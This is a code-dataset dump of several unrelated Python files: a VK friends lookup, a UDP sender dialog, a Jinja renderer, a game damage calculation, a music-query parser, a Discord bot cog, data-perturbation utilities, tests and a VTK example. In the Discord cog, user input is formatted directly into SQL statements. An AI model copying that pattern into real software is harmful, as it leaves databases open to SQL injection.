repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
stepuncius/vk_mutual_friends_finder
|
vk_mutual_friends_finder/get_names_of_users.py
|
1
|
1027
|
import pyvkontakte
from collections import namedtuple
def get_names_of_users(set_of_users):
"""Takes set of user's ids and returns namedtuple
with their names, last names and link on their pages.
Caution: It can't work with more than 1000 people,
it's vkapi's feauture.
"""
VK_ADRESS = "https://vk.com/id"
assert type(set_of_users) == set, "Not set given"
if (len(set_of_users) > 1000):
print("only first thousand of users will be shown.")
api = pyvkontakte.VkontakteApi()
string_of_ids = ",".join(map(str, set_of_users))
response = api.call("users.get", user_ids=string_of_ids, v='5.8')
user = namedtuple(
'user', ['adress', 'first_name', 'last_name', 'id'])
result = [user(
adress=VK_ADRESS + str(usr['id']),
id=usr['id'],
first_name=usr['first_name'],
last_name=usr['last_name']
)
for usr in response]
return result
if __name__ == "__main__":
print(get_names_of_users(set((1, 3, 6))))
|
bsd-2-clause
| -5,208,632,784,300,567,000
| 33.233333
| 69
| 0.59591
| false
| 3.16
| false
| false
| false
|
motmot/flytrax
|
motmot/flytrax/trax_udp_sender.py
|
1
|
4075
|
import pkg_resources
import socket, threading
import wx
from wx import xrc
RESFILE = pkg_resources.resource_filename(__name__,"trax_udp_sender.xrc") # trigger extraction
RES = xrc.EmptyXmlResource()
RES.LoadFromString(open(RESFILE).read())
class UDPSender(object):
"""A base class for keeping track of a list of UDP receiver hostnames
Use this class in the following way to get a list of hostnames to send data to:
hosts = udp_sender_instance.get_downstream_hosts()
for host in hosts:
sockobj.sendto( 'hello', host)
"""
def __init__(self,frame):
self.frame = frame
self._remote_host_lock = threading.Lock()
self._remote_host_changed = threading.Event()
self._remote_host_caller = []
self._remote_host_gui = []
self.edit_udp_receivers_dlg = RES.LoadDialog(self.frame,"UDP_RECEIVER_DIALOG")
#####################
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_ADD")
ctrl.Bind(wx.EVT_BUTTON, self.OnUDPAdd )
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_EDIT")
wx.EVT_BUTTON(ctrl,ctrl.GetId(),self.OnUDPEdit)
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_REMOVE")
wx.EVT_BUTTON(ctrl,ctrl.GetId(),self.OnUDPRemove)
#######################
def get_downstream_hosts(self):
if self._remote_host_changed.isSet():
self._remote_host_lock.acquire()
try:
# copy items out of list shared across threads
self._remote_host_caller = self._remote_host_gui
self._remote_host_changed.clear()
finally:
self._remote_host_lock.release()
return self._remote_host_caller
def OnEditUDPReceivers(self,event):
self.edit_udp_receivers_dlg.ShowModal()
def remote_hosts_changed(self):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
n = listctrl.GetCount()
self._remote_host_lock.acquire()
try:
self._remote_host_changed.set()
self._remote_host_gui = []
for idx in range(n):
self._remote_host_gui.append( listctrl.GetClientData(idx) )
finally:
self._remote_host_lock.release()
def OnEnableSendToIP(self,event):
widget = event.GetEventObject()
if widget.IsChecked():
self.send_over_ip.set()
else:
self.send_over_ip.clear()
def OnUDPAdd(self,event):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
dlg = wx.TextEntryDialog(self.wx_parent,
'Please add the hostname',
)
try:
if dlg.ShowModal() == wx.ID_OK:
hostname = dlg.GetValue()
try:
ip = socket.gethostbyname(hostname)
except socket.gaierror, x:
dlg2 = wx.MessageDialog(dlg,
'error getting IP address: '+str(x),
'FlyTrax: socket error',
wx.OK | wx.ICON_ERROR)
dlg2.ShowModal()
dlg2.Destroy()
else:
remote_host = (ip, 28931)
if hostname != '':
toshow = hostname
else:
toshow = str(ip)
idx = listctrl.Append( toshow )
listctrl.SetClientData(idx,remote_host)
self.remote_hosts_changed()
finally:
dlg.Destroy()
def OnUDPEdit(self,event):
widget = event.GetEventObject()
def OnUDPRemove(self,event):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
idx = listctrl.GetSelection()
if idx==wx.NOT_FOUND:
return
remote_host = listctrl.GetClientData(idx)
listctrl.Delete(idx)
self.remote_hosts_changed()
|
bsd-3-clause
| -2,490,107,922,923,382,000
| 33.533898
| 94
| 0.547485
| false
| 3.929605
| false
| false
| false
|
mmclenna/engine
|
sky/build/template.py
|
1
|
1665
|
#!/usr/bin/env python
#
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Renders a single template file using the Jinga templating engine.'''
import argparse
import sys
import os
import itertools
sys.path.append(os.path.join(os.path.dirname(__file__), '../../third_party'))
import jinja2
from jinja2 import Environment, FileSystemLoader
def make_stamp_file(stamp_path):
dir_name = os.path.dirname(stamp_path)
with open(stamp_path, 'a'):
os.utime(stamp_path, None)
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--template', help='The template file to render')
parser.add_argument('--stamp', help='The template stamp file')
parser.add_argument('--output',
help='The output file to render the template to')
parser.add_argument('vars', metavar='V', nargs='+',
help='A list of key value pairs used as template args')
args = parser.parse_args()
template_file = os.path.abspath(args.template)
if not os.path.isfile(template_file):
print 'Cannot find file at path: ', template_file
return 1
env = jinja2.Environment(loader=FileSystemLoader('/'),
undefined=jinja2.StrictUndefined)
template = env.get_template(template_file)
variables = dict(itertools.izip_longest(*[iter(args.vars)] * 2, fillvalue=''))
output = template.render(variables)
with open(os.path.abspath(args.output), 'wb') as file:
file.write(output)
make_stamp_file(args.stamp)
if __name__ == '__main__':
main()
|
bsd-3-clause
| 4,045,351,747,393,844,700
| 27.220339
| 80
| 0.679279
| false
| 3.75
| false
| false
| false
|
pyfa-org/eos
|
eos/eve_obj/effect/dmg_dealer/fighter/missiles.py
|
1
|
1879
|
# ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
from eos.const.eve import AttrId
from eos.eve_obj.effect.dmg_dealer.base import DmgDealerEffect
from eos.eve_obj.effect.fighter_effect import FighterEffect
from eos.stats_container import DmgStats
class FighterAbilityMissiles(DmgDealerEffect, FighterEffect):
def get_volley(self, item):
if not self.get_cycles_until_reload(item):
return DmgStats(0, 0, 0, 0)
em = item.attrs.get(AttrId.fighter_ability_missiles_dmg_em, 0)
therm = item.attrs.get(AttrId.fighter_ability_missiles_dmg_therm, 0)
kin = item.attrs.get(AttrId.fighter_ability_missiles_dmg_kin, 0)
expl = item.attrs.get(AttrId.fighter_ability_missiles_dmg_expl, 0)
dmg_mult = item.attrs.get(AttrId.fighter_ability_missiles_dmg_mult, 1)
squad_size = self.get_squad_size(item)
mult = dmg_mult * squad_size
return DmgStats(em, therm, kin, expl, mult)
def get_applied_volley(self, item, tgt_data):
raise NotImplementedError
|
lgpl-3.0
| -1,862,110,855,468,433,400
| 42.697674
| 80
| 0.662586
| false
| 3.403986
| false
| false
| false
|
aaiijmrtt/MUSICALQA
|
code/language.py
|
1
|
3650
|
import pyparsing
literals = lambda literallist: pyparsing.Or([pyparsing.Literal(literal) for literal in literallist])
times = literals(['breve', 'breves', 'semibreve','semibreves', 'minim', 'minims', 'crotchets', 'crotchet', 'quavers', 'quaver', 'semiquaver','semiquavers', 'demisemiquaver', 'demisemiquavers'])
augmentedtimes = literals(['dotted', 'double dotted'])
notes = literals(['B', 'C', 'D', 'E', 'F', 'G', 'Do', 'Re', 'Mi', 'Fa', 'Sol', 'La', 'Ti', 'do', 're', 'mi', 'fa', 'sol', 'la', 'ti'])
augmentednotes = literals(['#', 'b'])
octave = literals(['1', '2', '3', '4', '5', '6', '7'])
instruments = literals(['flute', 'oboe', 'violin', 'violin I', 'violin II', 'timpani', 'double basses', 'cello', 'bass', 'horn', 'piano', 'harpsichord'])
hands = literals(['right', 'left'])
conjunction = literals(['against', 'followed by'])
clef = literals(['bass', 'treble'])
alphanumerals = literals(['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve'])
passage = literals(['homophonic', 'monophonic', 'polyphonic'])
query = pyparsing.And([
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
alphanumerals,
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
pyparsing.Literal('chord'),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.ZeroOrMore(
pyparsing.And([
pyparsing.Group(pyparsing.Optional(augmentedtimes)),
times
])
)
),
pyparsing.Group(
pyparsing.ZeroOrMore(
pyparsing.And([
notes,
pyparsing.Group(pyparsing.Optional(augmentednotes)),
pyparsing.Group(pyparsing.Optional(octave))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
pyparsing.Literal('rest'),
pyparsing.Literal('notes'),
pyparsing.Literal('note'),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
alphanumerals,
pyparsing.Or([
pyparsing.Literal('note'),
pyparsing.Literal('notes')
]),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal("on the word ""),
pyparsing.ZeroOrMore(pyparsing.Word(pyparsing.alphas)),
pyparsing.Literal("!"")
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
passage,
pyparsing.Literal('passage')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Or([
pyparsing.Literal('in bars'),
pyparsing.Literal('in measures')
]),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Or([
pyparsing.Literal('-'),
pyparsing.Literal('to')
]),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in'),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Literal('/'),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Literal('time')
]),
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in the'),
clef,
pyparsing.Literal('clef')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in the'),
instruments
])
)
)
])
compound = pyparsing.And([
query,
pyparsing.ZeroOrMore(
pyparsing.And([
conjunction,
query
])
)
])
def parse(question):
return query.parseString(question).asList()
if __name__ == '__main__':
print parse('dotted crotchet G6')
|
mit
| -770,983,344,402,978,700
| 22.101266
| 193
| 0.629041
| false
| 2.853792
| false
| false
| false
|
doshaq/Doshabot
|
cogs/game.py
|
1
|
1090
|
from discord.ext import commands
import sqlite3
class game :
conn = sqlite3.connect('bot_game.db')
c = conn.cursor()
def __init__(self, bot):
self.bot = bot
conn = sqlite3.connect('bot_game.db')
c = conn.cursor()
@commands.command(pass_context=True, no_pm=True)
async def join_game(self, ctx, *keywords):
self.c.execute("INSERT INTO players VALUES('{}','{}','{}','talking_island',1,NULL,'false')".format(str(ctx.message.author),keywords[0],keywords[1]))
self.conn.commit()
await self.bot.say("تم اضافتك للعبه")
@commands.command(pass_context=True,no_pm=True)
async def login(self,ctx):
self.c.execute("UPDATE players SET connect='true' WHERE username ='{}'".format(str(ctx.message.author)))
self.conn.commit()
await self.bot.say("تم الاتصال")
@commands.command(pass_context=True,no_pm=True)
async def logout(self,ctx):
self.c.execute("UPDATE players SET connect='false' WHERE username ='{}'".format(str(ctx.message.author)))
self.conn.commit()
await self.bot.say("تم قطع الاتصال")
def setup(bot):
bot.add_cog(game(bot))
|
gpl-3.0
| 7,310,226,834,112,171,000
| 39.653846
| 150
| 0.700758
| false
| 2.721649
| false
| false
| false
|
tgquintela/pySpatialTools
|
pySpatialTools/utils/perturbations/perturbations.py
|
1
|
23997
|
"""
Perturbations
-------------
Module oriented to perform a perturbation of the system in order to carry out
with statistical testing of models.
The main function of this module is grouping functions which are able to
change the system to other statistically probable options in order to explore
the sample space.
TODO
----
-Aggregation perturbation:
--- Discretization perturbed.
--- Fluctuation of features between borders.
- Fluctuation of borders
--- Fluctuation of edge points
--- Fluctuation over sampling points
"""
import numpy as np
###############################################################################
############################ Location perturbation ############################
###############################################################################
class BasePerturbation:
"""General perturbation. It constains default functions for perturbation
objects.
"""
def _initialization(self):
self.locations_p = None
self.features_p = None
self.relations_p = None
self.discretizations_p = None
self.k_perturb = 1
## Ensure correctness
self.assert_correctness()
def assert_correctness(self):
"""Assert the correct Perturbation class."""
assert('_categorytype' in dir(self))
assert('_perturbtype' in dir(self))
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return i
################## Transformations of the main elements ###################
def apply2locs(self, locations):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray or others
the spatial information to be perturbed.
Returns
-------
locations: np.ndarray or others
the spatial information perturbated.
"""
return locations
def apply2features(self, features):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
return features
def apply2relations(self, relations):
"""Apply perturbation to relations.
Parameters
----------
relations: np.ndarray or others
the relations between elements to be perturbated.
Returns
-------
relations: np.ndarray or others
the relations between elements perturbated.
"""
return relations
def apply2discretizations(self, discretization):
"""Apply perturbation to discretization.
Parameters
----------
discretization: np.ndarray or others
the discretization perturbation.
Returns
-------
discretization: np.ndarray or others
the discretization perturbation.
"""
return discretization
######################### Precomputed applications ########################
def apply2features_ind(self, features, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return self.features_p[i, :, k]
def apply2locs_ind(self, locations, i, k):
"""Apply perturbation to locations individually for precomputed
applications.
Parameters
----------
locations: np.ndarray or others
the spatial information to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the spatial information perturbated.
"""
return self.locations_p[i, :, k]
def apply2relations_ind(self, relations, i, k):
"""For precomputed applications. Apply perturbation to relations.
Parameters
----------
relations: np.ndarray or others
the relations between elements to be perturbated.
Returns
-------
relations: np.ndarray or others
the relations between elements perturbated.
"""
return self.relations_p[i, :, k]
##################### Selfcomputation of main elements ####################
def selfcompute_features(self, features):
pass
def selfcompute_locations(self, locations):
pass
def selfcompute_relations(self, relations):
pass
def selfcompute_discretizations(self, discretizations):
pass
################################# Examples ################################
# def selfcompute_locations(self, locations):
# self.locations_p = self.apply2locs(locations)
#
# def selfcompute_features(self, features):
# self.features_p = self.apply2features(features)
###############################################################################
############################## None perturbation ##############################
###############################################################################
class NonePerturbation(BasePerturbation):
"""None perturbation. Default perturbation which not alters the system."""
_categorytype = "general"
_perturbtype = "none"
def __init__(self, k_perturb=1):
"""The none perturbation, null perturbation where anything happens.
Parameters
----------
k_perturb: int (default=1)
the number of perturbations applied.
"""
self._initialization()
self.k_perturb = k_perturb
###############################################################################
############################ Location perturbation ############################
###############################################################################
class JitterLocations(BasePerturbation):
"""Jitter module to perturbe locations of the system in order of testing
methods.
TODO: Fit some model for infering stds.
"""
_categorytype = "location"
_perturbtype = "jitter_coordinate"
def __init__(self, stds=0, k_perturb=1):
"""The jitter locations apply to locations a jittering perturbation.
Parameters
----------
k_perturb: int (default=1)
the number of perturbations applied.
"""
self._initialization()
self._stds = np.array(stds)
self.k_perturb = k_perturb
def apply2locs(self, locations, k=None):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray
the spatial information to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
locations: np.ndarray
the spatial information perturbated.
"""
## Preparation of ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
locations_p = np.zeros((len(locations), locations.shape[1], len(ks)))
for ik in range(len(ks)):
jitter_d = np.random.random(locations.shape)
locations_pj = np.multiply(self._stds, jitter_d) + locations
locations_p[:, :, ik] = locations_pj
return locations_p
class PermutationPerturbationLocations(BasePerturbation):
"""Reindice perturbation for the whole locations."""
_categorytype = "location"
_perturbtype = "element_permutation"
def __init__(self, reindices):
"""Perturbations by permuting locations.
Parameters
----------
reindices: np.ndarray
the reindices to apply permutation perturbations.
"""
self._initialization()
self._format_reindices(reindices)
def _format_reindices(self, reindices):
"""Format reindices.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
if type(reindices) == np.ndarray:
self.k_perturb = reindices.shape[1]
self.reindices = reindices
elif type(reindices) == tuple:
n, k_perturb = reindices
if type(n) == int and type(k_perturb) == int:
self.k_perturb = k_perturb
self.reindices = np.vstack([np.random.permutation(n)
for i in xrange(k_perturb)]).T
def apply2locs(self, locations, k=None):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray
the spatial information to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
locations: np.ndarray
the spatial information perturbated.
"""
## Preparation of ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
##Be coherent with the input location types
ndim = 1 if '__len__' not in dir(locations[0]) else len(locations[0])
if type(locations) == np.ndarray:
locations_p = np.zeros((len(locations), ndim, len(ks)))
for ik in range(len(ks)):
locations_p[:, :, ik] = locations[self.reindices[:, ks[ik]]]
else:
locations_p = [[[]]*len(locations)]*len(ks)
for ik in range(len(ks)):
for i in range(len(locations)):
locations_p[ik][i] = locations[self.reindices[i, ks[ik]]]
return locations_p
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return self.reindices[i, k]
###############################################################################
########################### Permutation perturbation ##########################
###############################################################################
class PermutationPerturbation(BasePerturbation):
"""Reindice perturbation for the whole features variables."""
_categorytype = "feature"
_perturbtype = "element_permutation"
def __init__(self, reindices):
"""Element perturbation for all permutation perturbation.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
self._initialization()
self._format_reindices(reindices)
def _format_reindices(self, reindices):
"""Format reindices for permutation reindices.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
if type(reindices) == np.ndarray:
self.k_perturb = reindices.shape[1]
self.reindices = reindices
elif type(reindices) == tuple:
n, k_perturb = reindices
if type(n) == int and type(k_perturb) == int:
self.k_perturb = k_perturb
self.reindices = np.vstack([np.random.permutation(n)
for i in xrange(k_perturb)]).T
def apply2features(self, features, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
## Assert good features
assert len(features) == len(self.reindices)
## Prepare ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
## Computation of new prturbated features
sh = len(features), features.shape[1], len(ks)
features_p = np.zeros(sh)
for ik in range(len(ks)):
features_p[:, :, ik] = features[self.reindices[:, ks[ik]], :]
return features_p
def apply2features_ind(self, features, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return features[self.reindices[i, k]]
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return self.reindices[i, k]
class PermutationPerturbationGeneration(PermutationPerturbation):
"""Reindice perturbation for the whole features variables."""
def __init__(self, n, m=1, seed=None):
"""Element perturbation for all permutation perturbation.
Parameters
----------
n: int
the size of the sample to create the reindices.
m: int (default=1)
the number of permutations we want to generate.
seed: int (default=Npne)
the seed to initialize and create the same reindices.
"""
self._initialization()
if seed is not None:
np.random.seed(seed)
self._format_reindices((n, m))
class PartialPermutationPerturbationGeneration(PermutationPerturbation):
"""Reindice perturbation for the whole features variables. It can control
the proportion of the whole sample is going to be permuted.
"""
def __init__(self, n, rate_pert=1., m=1, seed=None):
"""Element perturbation for all permutation perturbation.
Parameters
----------
n: int
the size of the sample to create the reindices.
m: int (default=1)
the number of permutations we want to generate.
seed: int (default=Npne)
the seed to initialize and create the same reindices.
"""
self._initialization()
if seed is not None:
np.random.seed(seed)
if rate_pert == 1.:
self._format_reindices((n, m))
else:
n_sample = int(n*rate_pert)
indices = np.random.permutation(n)[:n_sample]
reindices = np.vstack([np.arange(n) for i in xrange(m)]).T
reindices[indices] = np.vstack([np.random.permutation(n_sample)
for i in xrange(m)]).T
self.k_perturb = m
self.reindices = reindices
###############################################################################
############################# Element perturbation ############################
###############################################################################
## TODO:
class MixedFeaturePertubation(BasePerturbation):
"""An individual-column-created perturbation of individual elements."""
_categorytype = "feature"
_perturbtype = "element_mixed"
def __init__(self, perturbations):
"""The MixedFeaturePertubation is the application of different
perturbations to features.
perturbations: list
the list of pst.BasePerturbation objects.
"""
msg = "Perturbations is not a list of individual perturbation methods."
self._initialization()
if type(perturbations) != list:
raise TypeError(msg)
try:
self.typefeats = [p._perturbtype for p in perturbations]
k_perturbs = [p.k_perturb for p in perturbations]
assert all([k == k_perturbs[0] for k in k_perturbs])
self.k_perturb = k_perturbs[0]
self.perturbations = perturbations
except:
raise TypeError(msg)
def apply2features(self, features):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
assert features.shape[1] == len(self.perturbations)
## Apply individual perturbation for each features
features_p, n = [], len(features)
k_pos = list(range(self.k_perturb))
for i in range(len(self.perturbations)):
features_p_k =\
self.perturbations[i].apply2features(features[:, [i]], k_pos)
features_p_k = features_p_k.reshape((n, 1, self.k_perturb))
features_p.append(features_p_k)
features_p = np.concatenate(features_p, axis=1)
return features_p
########################### Individual perturbation ###########################
###############################################################################
class DiscreteIndPerturbation(BasePerturbation):
"""Discrete perturbation of a discrete feature variable."""
_categorytype = "feature"
_perturbtype = "discrete"
def __init__(self, probs):
"""The discrete individual perturbation to a feature variable.
Parameters
----------
probs: np.ndarray
the probabilities to change from a value of a category to another
value.
"""
self._initialization()
if np.all(probs.sum(1) != 1):
raise TypeError("Not correct probs input.")
if probs.shape[0] != probs.shape[1]:
raise IndexError("Probs is noot a square matrix.")
self.probs = probs.cumsum(1)
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
## Prepare loop
categories = np.unique(feature)
if len(categories) != len(self.probs):
msg = "Not matching dimension between probs and features."
raise IndexError(msg)
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
## Compute each change
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
for i in xrange(len(feature)):
r = np.random.random()
idx = np.where(feature[i] == categories)[0]
idx2 = np.where(self.probs[idx] > r)[0][0]
feature_p[i, i_k] = categories[idx2]
return feature_p
class ContiniousIndPerturbation(BasePerturbation):
"""Continious perturbation for an individual feature variable."""
_categorytype = "feature"
_perturbtype = "continious"
def __init__(self, pstd):
"""The continious individual perturbation to a feature variable.
Parameters
----------
pstd: float
the dispersion measure of the jittering.
"""
self._initialization()
self.pstd = pstd
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
jitter_d = np.random.random(len(feature))
feature_p[:, i_k] = np.multiply(self.pstd, jitter_d)
return feature_p
class PermutationIndPerturbation(BasePerturbation):
"""Reindice perturbation for an individual feature variable."""
_categorytype = "feature"
_perturbtype = "permutation_ind"
def __init__(self, reindices=None):
"""Individual feature perturbation.
Parameters
----------
reindices: np.ndarray (default=None)
the reindices to apply permutation perturbations.
"""
self._initialization()
if type(reindices) == np.ndarray:
self.reindices = reindices
self.k_perturb = reindices.shape[1]
else:
raise TypeError("Incorrect reindices.")
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
feature_p[:, [i_k]] = feature[self.reindices[:, i_k]]
return feature_p
def apply2features_ind(self, feature, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return feature[self.reindices[i, k]]
###############################################################################
########################### Aggregation perturbation ##########################
###############################################################################
class JitterRelationsPerturbation(BasePerturbation):
"""Jitter module to perturbe relations of the system in order of testing
methods.
"""
_categorytype = "relations"
|
mit
| -2,054,015,461,161,471,700
| 30.124514
| 79
| 0.535817
| false
| 4.616583
| false
| false
| false
|
mattvonrocketstein/smash
|
tests/units/test_utils.py
|
1
|
1228
|
""" tests/test_utils
"""
import os
from smashlib.testing import TestCase, hijack_ipython_module, main
from smashlib.plugins.smash_completer import SmashCompleter, smash_env_complete
from smashlib.overrides import SmashTerminalInteractiveShell
from mock import Mock
hijack_ipython_module()
from IPython.testing.tools import default_config
from IPython.core.completerlib import TryNext
from IPython.testing.globalipapp import get_ipython
from smashlib.util import bash
ffile = os.path.join(os.path.dirname(__file__),
'function.sh')
class TestUtils(TestCase):
def setUp(self):
return
self.shell = Mock()
self.config = default_config()
self.shell.config = self.config
self.plugin = SmashCompleter(self.shell)
self.event = Mock()
def test_get_functions_from_file(self):
self.assertTrue(os.path.exists(ffile))
self.assertEqual(
['simple_function'],
bash.get_functions_from_file(ffile))
def test_run_function_from_file(self):
self.assertEqual(
bash.run_function_from_file(
'simple_function', ffile),
['simple bash function'])
if __name__=='__main__':
main()
|
mit
| -5,957,990,363,373,603,000
| 31.315789
| 79
| 0.668567
| false
| 3.813665
| true
| false
| false
|
hlzz/dotfiles
|
graphics/VTK-7.0.0/Examples/DataManipulation/Python/FinancialField.py
|
1
|
8881
|
#!/usr/bin/env python
# This example demonstrates the use of fields and use of
# vtkProgrammableDataObjectSource. It creates fields the hard way (as
# compared to reading a vtk field file), but shows you how to
# interface to your own raw data.
import os
import re
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
xAxis = "INTEREST_RATE"
yAxis = "MONTHLY_PAYMENT"
zAxis = "MONTHLY_INCOME"
scalar = "TIME_LATE"
def getNumberFromLine(line):
patn = re.compile('[-+]{0,1}[\d.]+e?[-+\d]*', re.M)
val = patn.findall(line)
ret = []
for i in val:
ret.append(float(i))
return ret
# Parse an ASCII file and manually create a field. Then construct a
# dataset from the field.
dos = vtk.vtkProgrammableDataObjectSource()
# First define the function that will parse the data.
def parseFile():
global VTK_DATA_ROOT, dos
# Use Python to read an ASCII file
file = open(os.path.join(VTK_DATA_ROOT, "Data/financial.txt"), "r")
line = file.readline()
numPts = int(getNumberFromLine(line)[0])
numLines = (numPts - 1)//8
# Get the data object's field data and allocate
# room for 4, fields
fieldData = dos.GetOutput().GetFieldData()
fieldData.AllocateArrays(4)
# read TIME_LATE - dependent variable
# search the file until an array called TIME_LATE is found
while file.readline()[:9] != "TIME_LATE":
pass
# Create the corresponding float array
timeLate = vtk.vtkFloatArray()
timeLate.SetName("TIME_LATE")
# Read the values
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
timeLate.InsertNextValue(val[j])
# Add the array
fieldData.AddArray(timeLate)
# MONTHLY_PAYMENT - independent variable
while file.readline()[:15] != "MONTHLY_PAYMENT":
pass
monthlyPayment = vtk.vtkFloatArray()
monthlyPayment.SetName("MONTHLY_PAYMENT")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyPayment.InsertNextValue(val[j])
fieldData.AddArray(monthlyPayment)
# UNPAID_PRINCIPLE - skip
while file.readline()[:16] != "UNPAID_PRINCIPLE":
pass
